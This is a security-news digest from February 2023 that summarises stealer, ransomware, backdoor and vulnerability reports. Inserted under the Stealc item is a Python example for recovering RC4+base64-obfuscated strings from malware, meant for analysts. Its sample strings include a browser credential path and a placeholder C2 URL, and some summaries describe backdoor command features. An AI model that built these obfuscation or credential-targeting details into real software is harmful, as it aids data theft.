                Autosummary: Some of the key actors involved in the efforts include FROZENBARENTS (aka Sandworm or Voodoo Bear), FROZENLAKE (aka APT28 or Fancy Bear), COLDRIVER (aka Callisto Group), FROZENVISTA (aka DEV-0586 or UNC2589), and SUMMIT (aka Turla or Venomous Bear).


                SANS Institute unveils new cybersecurity training for IT administrators

                ciber
                2023-02-20 https://www.helpnetsecurity.com/2023/02/20/sans-security-essentials-for-it-administrators/

                SANS Security Awareness, a division of the SANS Institute, launched its new short-form technical training modules, “Security Essentials for IT Administrators.” This series provides a comprehensive review of cybersecurity principles, specifically targeting those with a foundational understanding of IT systems and/or network administration to keep them up-to-date and knowledgeable in the constantly evolving cybersecurity landscape. Relevant training for this audience is essential in the overall security posture of an organization as more IT professionals, such … More

                The post SANS Institute unveils new cybersecurity training for IT administrators appeared first on Help Net Security.




                New Stealc malware emerges with a wide set of stealing capabilities

                exploits
                2023-02-20 https://www.bleepingcomputer.com/news/security/new-stealc-malware-emerges-with-a-wide-set-of-stealing-capabilities/
                A new information stealer called Stealc has emerged on the dark web gaining traction due to aggressive promotion of stealing capabilities and similarities with malware of the same kind like Vidar, Raccoon, Mars, and Redline. [...]

                Autosummary: The features that SEKOIA could verify by analyzing the captured sample are the following: a lightweight build of only 80KB; use of legitimate third-party DLLs; written in C and abusing Windows API functions; most strings obfuscated with RC4 and base64; automatic exfiltration of stolen data; and targeting of 22 web browsers, 75 plugins, and 25 desktop wallets. SEKOIA's current report does not include all the data obtained from reverse engineering Stealc but provides an overview of the main steps of its execution.
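Strings that are RC4-encrypted and then base64-encoded are cheap to recover once the key is known: scan the binary for base64-looking runs, decode each one, decrypt it, and keep the results that come out as clean text. The block below is an added example, not SEKOIA's tooling or Stealc's own code; only the RC4-plus-base64 scheme comes from the summary. The key, the plaintext strings and the fake binary blob are constructed so it runs offline, and in a real case the key is something you first pull out of the decryption routine in the disassembly.

```python
"""Recovering RC4+base64 obfuscated strings from a stealer-style sample.

Added example for this page, not SEKOIA's tooling or Stealc's code.  RC4 is
the textbook KSA/PRGA; the key, the plaintext strings and the binary "blob"
below are constructed so the example runs offline.
"""
from __future__ import annotations

import base64
import binascii
import re
import string

PRINTABLE = set(string.printable)
# Base64 runs of at least 8 characters, optionally padded.
CANDIDATE = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling, then XOR the data with the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def obfuscate(plain: str, key: bytes) -> str:
    """What a builder does: RC4 the string, then base64 the ciphertext."""
    return base64.b64encode(rc4(key, plain.encode())).decode()


def deobfuscate(token: str, key: bytes) -> str | None:
    """Reverse one token; None if it is not valid base64 or does not decrypt to text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    plain = rc4(key, raw)
    try:
        text = plain.decode("ascii")
    except UnicodeDecodeError:
        return None
    # A wrong key or a non-string blob yields bytes that almost never pass this test.
    return text if text and all(c in PRINTABLE for c in text) else None


def recover_strings(blob: bytes, key: bytes) -> list[str]:
    """Scan a binary for base64-looking runs and keep those that decrypt cleanly."""
    found = []
    for m in CANDIDATE.finditer(blob):
        text = deobfuscate(m.group().decode("ascii"), key)
        if text is not None:
            found.append(text)
    return found


# Constructed sample: a key and strings of the kind a stealer hides.
KEY = b"example-rc4-key"
STRINGS = [
    r"\Google\Chrome\User Data\Default\Login Data",
    "kernel32.dll",
    "https://c2.example.invalid/gate.php",
]
# A fake "binary": junk bytes around the obfuscated strings, NUL-separated.
BLOB = (
    b"MZ\x90\x00\x03\x00\x00"
    + b"\x00".join(obfuscate(s, KEY).encode() for s in STRINGS)
    + b"\x00\xcc\xcc\xff\xe8\x00"
)


if __name__ == "__main__":
    for s in recover_strings(BLOB, KEY):
        print(s)
```

The printable-text filter is what makes the scan usable on a whole binary: every base64-looking run is tried, and the ones that were never strings (or were encrypted under a different key) decrypt to noise and are dropped. Stealc's sample reportedly stores only "most" strings this way, so expect plain strings alongside the recovered ones.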


                HardBit ransomware wants insurance details to set the perfect price

                exploits ransomware
                2023-02-20 https://www.bleepingcomputer.com/news/security/hardbit-ransomware-wants-insurance-details-to-set-the-perfect-price/
                A ransomware threat called HardBit has moved to version 2.0 and its operators are trying to negotiate a ransom payment that would be covered by the victim's insurance company. [...]

                Autosummary: "To avoid all this and get the money on the insurance, be sure to inform us anonymously about the availability and terms of the insurance coverage, it benefits both you and us, but it does not benefit the insurance company," HardBit operators say in a note to victims.


                Chip company loses $250m after ransomware hits supply chain

                exploits ransomware
                2023-02-20 https://www.malwarebytes.com/blog/news/2023/02/chip-company-loses-250m-after-ransomware-hits-supply-chain

                Categories: News, Ransomware

                Tags: Applied Materials, MKS, ransomware, semiconductor

                Applied Materials has said it expects to miss $250 million in second-quarter sales due to a ransomware attack at a supplier.


                The post Chip company loses $250m after ransomware hits supply chain appeared first on Malwarebytes Labs.


                Autosummary: Applied Materials, one of the world’s leading suppliers of equipment, services, and software for the manufacture of semiconductors, has warned that its second-quarter sales are likely to be hurt to the tune of $250 million due to a cybersecurity attack at one of its suppliers.


                GoAnywhere zero-day opened door to Clop ransomware

                exploits ransomware
                2023-02-20 https://www.malwarebytes.com/blog/news/2023/02/goanywhere-zero-day-opened-door-to-clop-ransomware

                Categories: News, Ransomware

                Tags: Clop, Clop ransomware, ransomware, GoAnywhere, managed file transfer, MFT, Fortra, CISA, Known Exploited Vulnerabilities Catalog

                The Clop ransomware gang has claimed responsibility for a wave of attacks that exploited a zero-day in GoAnywhere MFT admin consoles.


                The post GoAnywhere zero-day opened door to Clop ransomware appeared first on Malwarebytes Labs.


                Autosummary: It recently filed a Form 8-K to the Securities and Exchange Commission (SEC), announcing the compromise of its system and disclosure of company data, including protected health information (PHI) and personal information (PI) of certain patients. The Cybersecurity & Infrastructure Security Agency (CISA) recently added CVE-2023-0669 to its Known Exploited Vulnerabilities Catalog, a list of software flaws that federal organizations must patch within two weeks.


                Will ChatGPT start writing killer malware?

                exploits
                2023-02-20 https://www.welivesecurity.com/2023/02/20/will-chatgpt-start-writing-killer-malware/

                AI-pocalypse soon? As stunning as ChatGPT’s output can be, should we also expect the chatbot to spit out sophisticated malware?

                The post Will ChatGPT start writing killer malware? appeared first on WeLiveSecurity


                Autosummary: A. We are not really close to “full AI-generated malware”, though ChatGPT is quite good at code suggestion, generating code examples and snippets, debugging, and optimizing code, and even automating documentation. This current robot hipster tech is a fancy autoresponder that is good enough to produce homework answers, research papers, legal responses, medical diagnoses, and a host of other things that have passed the “smell test” when treated as if they are the work of human actors.


                Streets under water in São Paulo state

                government
                2023-02-20 https://www.bbc.co.uk/news/world-latin-america-64701324?at_medium=RSS&at_campaign=KARANGA
                At least 36 people have been killed in Brazil after intense downpours caused floods and landslides.



                GoDaddy says it's a victim of multi-year cyberattack campaign

                ciber
                2023-02-20 https://www.malwarebytes.com/blog/news/2023/02/godaddy-says-its-a-victim-of-multi-year-cyberattack-campaign

                Categories: News

                Tags: GoDaddy, GoDaddy breach

                Hosting and domain name company GoDaddy says it believes a sophisticated threat actor group has been subjecting the company to a multi-year attack campaign.


                The post GoDaddy says it's a victim of multi-year cyberattack campaign appeared first on Malwarebytes Labs.


                Autosummary: Make sure your hosting account is secure. If you are using GoDaddy or other hosting services, now is a good time to review your credentials and ensure your account is as locked up as possible. Hosting and domain name company GoDaddy says it believes a "sophisticated threat actor group" has been subjecting the company to a multi-year attack campaign.


                Alteryx Analytics Cloud platform updates boost decision intelligence

                industry
                2023-02-19 https://www.helpnetsecurity.com/2023/02/19/alteryx-platform/

                Alteryx has unveiled new self-service and enterprise-grade capabilities to its Alteryx Analytics Cloud Platform to help customers make faster and more intelligent decisions. The enhanced platform, which now includes all access for Designer Cloud, offers an approachable easy-to-use drag-and-drop modern interface accessible to employees of all skill levels, without compromising data governance or security standards. “We are excited about the release of the Alteryx Designer product for the cloud and the ability to make analytics … More

                The post Alteryx Analytics Cloud platform updates boost decision intelligence appeared first on Help Net Security.


                Autosummary: With two-thirds of survey respondents indicating they would benefit from an easy and approachable cloud analytics interface, new Alteryx Analytics Cloud updates include: the reimagined Designer Cloud interface, now available in All Access, with more than 30 extended prep, blend, analysis, and automation tools for intelligent decision making.


                Week in review: Microsoft, Apple patch exploited zero-days, tips for getting hired in cybersecurity

                exploits ciber
                2023-02-19 https://www.helpnetsecurity.com/2023/02/19/week-in-review-microsoft-apple-patch-exploited-zero-days-tips-for-getting-hired-in-cybersecurity/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Combining identity and security strategies to mitigate risks The Identity Defined Security Alliance (IDSA), a nonprofit that provides vendor-neutral resources to help organizations reduce the risk of a breach by combining identity and security strategies, announced Jeff Reich as the organization’s new Executive Director. Can we predict cyber attacks? Bfore.AI says they can In this Help Net Security interview, Luigi … More

                The post Week in review: Microsoft, Apple patch exploited zero-days, tips for getting hired in cybersecurity appeared first on Help Net Security.


                Autosummary: In this role, Bhagwat will lead the evolution, growth, and expansion of the Entrust Digital Security portfolio, which includes solutions for data encryption, public and private certificate authorities, identity and access management, digital signing, and security policy management. New infosec products of the week: February 17, 2023. Here’s a look at the most interesting products from the past week, featuring releases from CyberSaint, DigiCert, Finite State, FireMon, and Veeam Software.


                Frebniis malware abuses Microsoft IIS feature to create a backdoor

                exploits
                2023-02-19 https://securityaffairs.com/142466/malware/frebniis-malware-iis.html

                Broadcom Symantec researchers have spotted a new malware, tracked as Frebniis, that abuses a Microsoft Internet Information Services (IIS) feature to deploy a backdoor and monitor all HTTP traffic to the infected system, […]

                The post Frebniis malware abuses Microsoft IIS feature to create a backdoor appeared first on Security Affairs.




                Wood loses boxing world title to Mexico"s Lara

                latam
                2023-02-19 https://www.bbc.co.uk/sport/boxing/64688427?at_medium=RSS&at_campaign=KARANGA
                Leigh Wood's reign as WBA featherweight champion is over after the Briton loses to hard-hitting Mauricio Lara in Nottingham.

                Autosummary: "I thought Leigh was cruising that fight, won four rounds on the spin, but Mauricio Lara came with a left hook from the heavens." Heartbreak for Wood in thriller: the loss is Wood's third in a 29-fight career. A fight widely expected to be a shootout between arguably two of the biggest punchers of the division did not disappoint. Victory for Mexican Lara brought his maiden world title. Wood seeks rematch as Lara and Warrington clash ringside. With so much emphasis nowadays put on protecting an unbeaten record, Wood has bounced back from defeats before and should be applauded for taking on a feared puncher in Lara as a voluntary defence, when easier options were available.


                GoDaddy Discloses Multi-Year Security Breach Causing Malware Installations and Source Code Theft

                exploits
                2023-02-18 https://thehackernews.com/2023/02/godaddy-discloses-multi-year-security.html
                Web hosting services provider GoDaddy on Friday disclosed a multi-year security breach that enabled unknown threat actors to install malware and siphon source code related to some of its services. The company attributed the campaign to a "sophisticated and organized group targeting hosting services." GoDaddy said in December 2022, it received an unspecified number of customer complaints about



                GoDaddy discloses a new data breach

                financial
                2023-02-18 https://securityaffairs.com/142405/data-breach/godaddy-discloses-data-breach-2.html

                GoDaddy discloses a security breach: threat actors stole source code and installed malware on its servers in a long-running attack. The threat actors breached its cPanel shared hosting environment; the company states that it is not […]

                The post GoDaddy discloses a new data breach appeared first on Security Affairs.


                Autosummary: “Advances in computer capabilities, discoveries of new weaknesses, increased likelihood of nation-state cyber attacks (including retaliatory cyber attacks by Russia in response to economic sanctions resulting from the Russia-Ukraine military conflict), and other developments with software generally used by the Internet community, such as the Meltdown and Spectre vulnerabilities, which exploit security flaws in chips manufactured in the last 20 years, the Shellshock vulnerability in the Linux Bash shell, the Log4Shell vulnerability in the widely used logging library Log4j, continually evolving ransomware attacks, or developments related to vendor software (e.g., SolarWinds Orion product incident), also increase the risk that we, or our customers using our servers and services, will suffer a security breach,” concludes the company.


                New WhiskerSpy malware delivered via trojanized codec installer

                exploits
                2023-02-18 https://www.bleepingcomputer.com/news/security/new-whiskerspy-malware-delivered-via-trojanized-codec-installer/
                Security researchers have discovered a new backdoor called WhiskerSpy used in a campaign from a relatively new advanced threat actor tracked as Earth Kitsune, known for targeting individuals showing an interest in North Korea. [...]

                Autosummary: WhiskerSpy details: WhiskerSpy is the main payload used in the latest ‘Earth Kitsune’ campaign, giving remote operators the following capabilities: interactive shell, download file, upload file, delete file, list files, take screenshot, load executable and call its export, and inject shellcode into a process. The backdoor communicates with the command and control (C2) server using a 16-byte AES key for encryption.


                XIoT vendors get serious about security, devote resources to protect cyber-physical systems

                industry
                2023-02-17 https://www.helpnetsecurity.com/2023/02/17/xiot-protect-cyber-physical-systems/

                Cyber-physical system vulnerabilities disclosed in the second half (2H) of 2022 have declined by 14% since hitting a peak during 2H 2021, while vulnerabilities found by internal research and product security teams have increased by 80% over the same time period, according to Claroty. Strengthening cyber-physical systems These findings indicate that security researchers are having a positive impact on strengthening the security of the Extended Internet of Things (XIoT), a vast network of cyber-physical systems … More

                The post XIoT vendors get serious about security, devote resources to protect cyber-physical systems appeared first on Help Net Security.




                Bao Fan: Chinese tech banker"s firm reports him missing

                financial
                2023-02-17 https://www.bbc.co.uk/news/world-asia-64672095?at_medium=RSS&at_campaign=KARANGA
                Bao Fan's company China Renaissance says they've not been able to make contact with their chairman.



                Critical RCE Vulnerability Discovered in ClamAV Open-Source Antivirus Software

                exploits
                2023-02-17 https://thehackernews.com/2023/02/critical-rce-vulnerability-discovered.html
                Cisco has rolled out security updates to address a critical flaw reported in the ClamAV open source antivirus engine that could lead to remote code execution on susceptible devices. Tracked as CVE-2023-20032 (CVSS score: 9.8), the issue relates to a case of remote code execution residing in the HFS+ file parser component. The flaw affects versions 1.0.0 and earlier, 0.105.1 and earlier, and

                Autosummary: Cisco separately also resolved a denial-of-service (DoS) vulnerability impacting Cisco Nexus Dashboard (CVE-2023-20014, CVSS score: 7.5) and two other privilege escalation and command injection flaws in Email Security Appliance (ESA) and Secure Email and Web Manager (CVE-2023-20009 and CVE-2023-20075, CVSS scores: 6.5).


                CISA adds Cacti, Office, Windows and iOS bugs to its Known Exploited Vulnerabilities Catalog

                exploits
                2023-02-17 https://securityaffairs.com/142376/security/cacti-office-windows-ios-bugs-to-known-exploited-vulnerabilities-catalog.html

                US CISA added actively exploited flaws in Cacti framework, Microsoft Office, Windows, and iOS to its Known Exploited Vulnerabilities Catalog. US CISA added the following actively exploited flaws to its Known Exploited Vulnerabilities Catalog: CVE-2022-46169 – Cacti is an open-source platform that provides a robust and extensible operational monitoring and fault management framework for users. The flaw […]

                The post CISA adds Cacti, Office, Windows and iOS bugs to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.




                New Mirai Botnet Variant "V3G4" Exploiting 13 Flaws to Target Linux and IoT Devices

                exploits industry
                2023-02-17 https://thehackernews.com/2023/02/new-mirai-botnet-variant-v3g4.html
                A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices. Observed during the second half of 2022, the new version has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor. "Once the vulnerable devices are compromised, they



                Cisco fixed critical RCE bug in ClamAV Open-Source Antivirus engine

                exploits
                2023-02-17 https://securityaffairs.com/142380/security/cisco-clamav-rce.html

                Cisco addressed a critical vulnerability, tracked as CVE-2023-20032 (CVSS score: 9.8), in the ClamAV open source antivirus engine that can lead to remote code execution on vulnerable devices. The vulnerability resides in the HFS+ file parser component; an attacker can trigger […]

                The post Cisco fixed critical RCE bug in ClamAV Open-Source Antivirus engine appeared first on Security Affairs.




                FBI is investigating a cybersecurity incident on its network

                ciber
                2023-02-17 https://www.bleepingcomputer.com/news/security/fbi-is-investigating-a-cybersecurity-incident-on-its-network/
                The U.S. Federal Bureau of Investigation (FBI) is reportedly investigating malicious cyber activity on the agency's network. [...]



                Three zero-days require urgent attention for Windows, Exchange

                exploits
                2023-02-17 https://www.computerworld.com/article/3688551/three-zero-days-require-urgent-attention-for-windows-exchange.html#tk.rss_security

                Autosummary: With Windows 10 21H2 now out of mainstream support, the following Microsoft applications will reach end of mainstream support or servicing in 2023: Visio Services in SharePoint (in Microsoft 365), Feb. 10, 2023 (retired); Microsoft Endpoint Configuration Manager, version 2107, Feb. 2, 2023 (end of service). Given the large number of changes included this month, I have broken down the testing scenarios into high-risk and standard-risk groups. High risk: as all the high-risk changes affect the Windows printing subsystem again this month, we have not seen any published functionality changes. Microsoft's February Patch Tuesday update deals with 76 vulnerabilities that affect Windows, Exchange, Office, and Microsoft development tools, and three Windows vulnerabilities (CVE-2023-21823, CVE-2023-21715 and CVE-2023-23376) have been reported as exploited in the wild and require immediate attention. Microsoft has released four patches to Microsoft Exchange Server (CVE-2023-21706, CVE-2023-21707, CVE-2023-21529, CVE-2023-21710), all of which are rated important. Microsoft development platforms: Microsoft released three critical updates affecting Visual Studio and .NET (CVE-2023-21808, CVE-2023-21815 and CVE-2023-23381) that could lead to arbitrary code execution. Browsers: Microsoft released three updates to its (Chromium) Edge browser: CVE-2023-21794, CVE-2023-23374 and CVE-2023-21720.


                Experts Warn of RambleOn Android Malware Targeting South Korean Journalists

                exploits
                2023-02-17 https://thehackernews.com/2023/02/experts-warn-of-rambleon-android.html
                Suspected North Korean nation-state actors targeted a journalist in South Korea with a malware-laced Android app as part of a social engineering campaign. The findings come from South Korea-based non-profit Interlab, which coined the new malware RambleOn. The malicious functionalities include the "ability to read and leak target's contact list, SMS, voice call content, location and others from



                ⚡Top Cybersecurity News Stories This Week — Cybersecurity Newsletter

                ciber
                2023-02-17 https://thehackernews.com/2023/02/top-cybersecurity-news-stories-this.html
                Hey 👋 there, cyber friends! Welcome to this week's cybersecurity newsletter, where we aim to keep you informed and empowered in the ever-changing world of cyber threats. In today's edition, we will cover some interesting developments in the cybersecurity landscape and share some insightful analysis of each to help you protect yourself against potential attacks. 1. Apple 📱 Devices Hacked with

                Autosummary: If not, it's time to do so, as the tech giant just released security updates for iOS, iPadOS, macOS, and Safari. So keep those firewalls up, keep those updates coming, and let's continue to stay curious, stay vigilant, and stay safe in the ever-changing digital landscape. Most of these compromised hosts are located in France, Germany, the Netherlands, the U.K., and Ukraine. Ransomware attacks like ESXiArgs can be devastating for organizations, causing data loss, financial losses, and reputational damage.


                GoDaddy: Hackers stole source code, installed malware in multi-year breach

                exploits
                2023-02-17 https://www.bleepingcomputer.com/news/security/godaddy-hackers-stole-source-code-installed-malware-in-multi-year-breach/
                Web hosting giant GoDaddy says it suffered a breach where unknown attackers have stolen source code and installed malware on its servers after breaching its cPanel shared hosting environment in a multi-year attack. [...]



                Mortal Kombat ransomware forms tag team with crypto-stealing malware

                exploits ransomware
                2023-02-17 https://www.malwarebytes.com/blog/news/2023/02/mortal-kombat-ransomware-forms-tag-team-partnership-with-laplas-clipper

                Categories: News

                Tags: mortal kombat, ransomware, laplas clipper, cryptocurrency, encrypt, network, infect, ransom, demand, BAT file, email, phish, phishing, attachment

                It’s like a choose your own adventure game gone horribly wrong.


                The post Mortal Kombat ransomware forms tag team with crypto-stealing malware appeared first on Malwarebytes Labs.


                Autosummary: The tag-team campaign serves up ransomware known as Mortal Kombat, which borrows the name made famous by the video game, and Laplas Clipper malware, a clipboard stealer. The clipper is also able to generate imitation addresses for a wide variety of cryptocurrencies including Monero, Bitcoin, Ethereum, Solana, and even Steam trading URLs. According to Talos, it has mainly been seen in the US, as well as the Philippines, the UK, and Turkey. Instructions are then provided to download the aforementioned chat program, add the attackers as a “friend”, and begin communication. Once installed on a system, Mortal Kombat targets a large selection of files for encryption, based on their file extensions.


                Search ads abused to spread malware – Week in security with Tony Anscombe

                exploits
                2023-02-17 https://www.welivesecurity.com/videos/search-ads-abused-spread-malware-week-security-tony-anscombe/

                Threat actors used search engine ads to impersonate makers of popular software and direct internet users to malicious websites

                The post Search ads abused to spread malware – Week in security with Tony Anscombe appeared first on WeLiveSecurity

                "

                Autosummary: "


                Hackers start using Havoc post-exploitation framework in attacks

                exploits
                2023-02-16 https://www.bleepingcomputer.com/news/security/hackers-start-using-havoc-post-exploitation-framework-in-attacks/
                Security researchers are seeing threat actors switching to a new and open-source command and control (C2) framework known as Havoc as an alternative to paid options such as Cobalt Strike and Brute Ratel. [...] "

                Autosummary: Like other exploitation kits, Havoc includes a wide variety of modules allowing pen testers (and hackers) to perform various tasks on exploited devices, including executing commands, managing processes, downloading additional payloads, manipulating Windows tokens, and executing shellcode. "


                Veeam Data Platform improves business resiliency in the case of disaster or cyberattacks

                ciber
                2023-02-16 https://www.helpnetsecurity.com/2023/02/16/veeam-data-platform/

                Veeam Software has released the Veeam Data Platform, a single platform delivering more advanced data security, recovery and hybrid cloud capabilities. The Veeam Data Platform, which includes Veeam Backup & Replication (VBR) v12, provides secure backup and recovery that keeps business running. It brings together the latest features offered from Veeam into a single solution that is offered in three enterprise-grade editions for protecting Cloud, Virtual, Physical, SaaS and Kubernetes applications across complex and expanding … More

                The post Veeam Data Platform improves business resiliency in the case of disaster or cyberattacks appeared first on Help Net Security.

                "

                Autosummary: Trusted immutability for every workload: Ensure backups can always be restored after a cyberattack with comprehensive, enterprise-grade immutability options from trusted vendors, including on-premises object, block and file storage, hardened repositories and deduplicating storage appliances, cloud object storage and tape. New functionality that advances enterprise-grade recovery capabilities ensures confidence in the face of disaster or cyber-attacks across the hybrid cloud, including: Direct-to-object storage backups: Take full advantage of the unlimited scalability of on-premises and cloud object storage without sacrificing performance. "


                New Threat Actor WIP26 Targeting Telecom Service Providers in the Middle East

                Telcos
                2023-02-16 https://thehackernews.com/2023/02/new-threat-actor-wip26-targeting.html
                Telecommunication service providers in the Middle East are being targeted by a previously undocumented threat actor as part of a suspected espionage-related campaign. Cybersecurity firms SentinelOne and QGroup are tracking the activity cluster under the former’s work-in-progress moniker WIP26. "WIP26 relies heavily on public cloud infrastructure in an attempt to evade detection by making "

                Autosummary: "


                ESXiArgs Ransomware Hits Over 500 New Targets in European Countries

                exploits ransomware
                2023-02-16 https://thehackernews.com/2023/02/esxiargs-ransomware-hits-over-500-new.html
                More than 500 hosts have been newly compromised en masse by the ESXiArgs ransomware strain, most of which are located in France, Germany, the Netherlands, the U.K., and Ukraine. The findings come from attack surface management firm Censys, which discovered "two hosts with strikingly similar ransom notes dating back to mid-October 2022, just after ESXi versions 6.5 and 6.7 reached end of life." "

                Autosummary: "


                New MortalKombat ransomware employed in financially motivated campaign

                financial exploits ransomware
                2023-02-16 https://securityaffairs.com/142319/cyber-crime/mortalkombat-ransomware.html

                Talos researchers observed a financially motivated threat actor using a new ransomware dubbed MortalKombat and a clipper malware named Laplas. Since December 2022, Cisco Talos researchers have been observing an unidentified financially motivated threat actor deploying two new malware, the recently discovered MortalKombat ransomware and a GO variant of the Laplas Clipper malware. The threat actor […]

                The post New MortalKombat ransomware employed in financially motivated campaign appeared first on Security Affairs.

                "

                Autosummary: "


                The teenager who cycled from Alaska to Argentina

                latam
                2023-02-16 https://www.bbc.co.uk/news/world-us-canada-64377365?at_medium=RSS&at_campaign=KARANGA
                Liam Garner, 17, declared himself the youngest person ever to cycle the Pan-American highway. "

                Autosummary: "


                Hackers backdoor Microsoft IIS servers with new Frebniis malware

                exploits
                2023-02-16 https://www.bleepingcomputer.com/news/security/hackers-backdoor-microsoft-iis-servers-with-new-frebniis-malware/
                Hackers are deploying a new malware named "Frebniis" on Microsoft’s Internet Information Services (IIS) that stealthily executes commands sent via web requests. [...] "

                Autosummary: The malware supports a set of commands sent to Frebniis via specially crafted HTTP requests (Symantec). "If an HTTP call to logon.aspx or default.aspx is received without the password parameter, but with the Base64 string, the Base64 string is assumed to be C# code that will be executed straight in memory," explains Symantec’s report. "


                Russian cybersecurity firm owner convicted of $90 million SEC earning reports hack

                rusia-ucrania ciber
                2023-02-16 https://www.tripwire.com/state-of-security/cybercriminal-convicted-90-million-sec-earning-reports-hack
                The owner of a Russian penetration-testing company has been found guilty of being part of an elaborate scheme that netted $90 million after stealing SEC earning reports. For nearly three years, 42-year-old Vladislav Klyushin - the owner of Moscow-based cybersecurity firm M-13 - and his co-conspirators had hacked into two US-based filing agents used by publicly-traded American companies to file earning reports to the Securities and Exchange Commission. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                Hackers Using Google Ads to Spread FatalRAT Malware Disguised as Popular Apps

                exploits
                2023-02-16 https://thehackernews.com/2023/02/hackers-using-google-ads-to-spread.html
                Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines. The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published "

                Autosummary: Some of the spoofed applications include Google Chrome, Mozilla Firefox, Telegram, WhatsApp, LINE, Signal, Skype, Electrum, Sogou Pinyin Method, Youdao, and WPS Office. "


                Researchers Warn of Critical Security Bugs in Schneider Electric Modicon PLCs

                exploits industry
                2023-02-16 https://thehackernews.com/2023/02/researchers-warn-of-critical-security.html
                Security researchers have disclosed two new vulnerabilities affecting Schneider Electric Modicon programmable logic controllers (PLCs) that could allow for authentication bypass and remote code execution. The flaws, tracked as CVE-2022-45788 (CVSS score: 7.5) and CVE-2022-45789 (CVSS score: 8.1), are part of a broader collection of security defects tracked by Forescout as OT:ICEFALL. Successful "

                Autosummary: "


                Microsoft Exchange ProxyShell flaws exploited in new crypto-mining attack

                exploits
                2023-02-16 https://www.bleepingcomputer.com/news/security/microsoft-exchange-proxyshell-flaws-exploited-in-new-crypto-mining-attack/
                A new malware dubbed "ProxyShellMiner" exploits the Microsoft Exchange ProxyShell vulnerabilities to deploy cryptocurrency miners throughout a Windows domain to generate profit for the attackers. [...] "

                Autosummary: Special command line parameter (Morphisec) "ProxyShellMiner uses an embedded dictionary, an XOR decryption algorithm, and an XOR key downloaded from a remote server," describes the Morphisec report. "


                Scandinavian Airlines says cyberattack caused passenger data leak

                ciber
                2023-02-16 https://www.bleepingcomputer.com/news/security/scandinavian-airlines-says-cyberattack-caused-passenger-data-leak/
                Scandinavian Airlines (SAS) has posted a notice warning passengers that a recent multi-hour outage of its website and mobile app was caused by a cyberattack that also exposed customer data. [...] "

                Autosummary: Anonymous Sudan Telegram (BleepingComputer). The threat actors state they attacked SAS due to an event that took place in front of the Turkish embassy in Stockholm, Sweden, on January 21, 2023, where a far-right nationalist group burnt a copy of the Holy Quran in protest to Turkey’s objections over Sweden’s NATO membership bid. "


                CISA warns of Windows and iOS bugs exploited as zero-days

                exploits
                2023-02-16 https://www.bleepingcomputer.com/news/security/cisa-warns-of-windows-and-ios-bugs-exploited-as-zero-days/
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added four security vulnerabilities exploited in attacks as zero-day to its list of bugs known to be abused in the wild. [...] "

                Autosummary: "


                Over 500 ESXiArgs Ransomware infections in one day, but they dropped the day after

                exploits ransomware
                2023-02-16 https://securityaffairs.com/142336/cyber-crime/esxiargs-ransomware-infections.html

                ESXiArgs ransomware continues to spread in Europe; most of the recent infections were observed in France, Germany, the Netherlands, the UK, and Ukraine. Researchers from Censys reported that more than 500 hosts have been infected in a new wave of ESXiArgs ransomware attacks, most of which are in France, Germany, the Netherlands, and the U.K. […]

                The post Over 500 ESXiArgs Ransomware infections in one day, but they dropped the day after appeared first on Security Affairs.

                "

                Autosummary: “Over the last few days, Censys has observed just over 500 hosts newly infected with ESXiArgs ransomware, most of which are in France, Germany, the Netherlands, and the UK.” "


                New Mirai malware variant infects Linux devices to build DDoS botnet

                exploits
                2023-02-16 https://www.bleepingcomputer.com/news/security/new-mirai-malware-variant-infects-linux-devices-to-build-ddos-botnet/
                A new Mirai botnet variant tracked as "V3G4" targets 13 vulnerabilities in Linux-based servers and IoT devices to use in DDoS (distributed denial of service) attacks. [...] "

                Autosummary: Webmin command injection; Spree Commerce arbitrary command execution; FLIR Thermal Camera remote command execution; CVE-2020-8515: DrayTek Vigor remote command execution; CVE-2020-15415: DrayTek Vigor remote command execution; CVE-2022-36267: "


                Ransomware pushes City of Oakland into state of emergency

                exploits government
                2023-02-16 https://www.malwarebytes.com/blog/news/2023/02/ransomware-pushes-city-of-oakland-into-state-of-emergency

                Categories: News

                Categories: Ransomware

                Tags: Oakland

                Tags: ransomware

                Tags: state of emergency

                The Interim City Administrator of the City of Oakland declared a state of emergency after a ransomware attack crippled the city’s services a week ago.


                The post Ransomware pushes City of Oakland into state of emergency appeared first on Malwarebytes Labs.

                "

                Autosummary: Fortunately, the attack has not affected crucial infrastructure like the 911 dispatch and fire and emergency resources, but the Oakland Police Department (OPD) did say that response time has been delayed and asked the public: If you don’t have an emergency or do not need an immediate emergency response, please consider the following means to report incidents: OPD Online Reporting: oaklandca.gov; Oak 311: for urgent issues, call 311. The ransomware attack that hit Oakland on Wednesday February 8, 2023 is still crippling many of the city’s services a week later. "


                Arris router vulnerability could lead to complete takeover

                exploits
                2023-02-16 https://www.malwarebytes.com/blog/news/2023/02/arris-vulnerability-found-in-commonly-used-router-could-result-in-complete-take-over

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Yerodin Richards

                Tags: Arris

                Tags: router

                Tags: CVE-2022-45701

                Tags: default credentials

                A security researcher found an authenticated remote code execution vulnerability in very widespread Arris router models.


                The post Arris router vulnerability could lead to complete takeover appeared first on Malwarebytes Labs.

                "

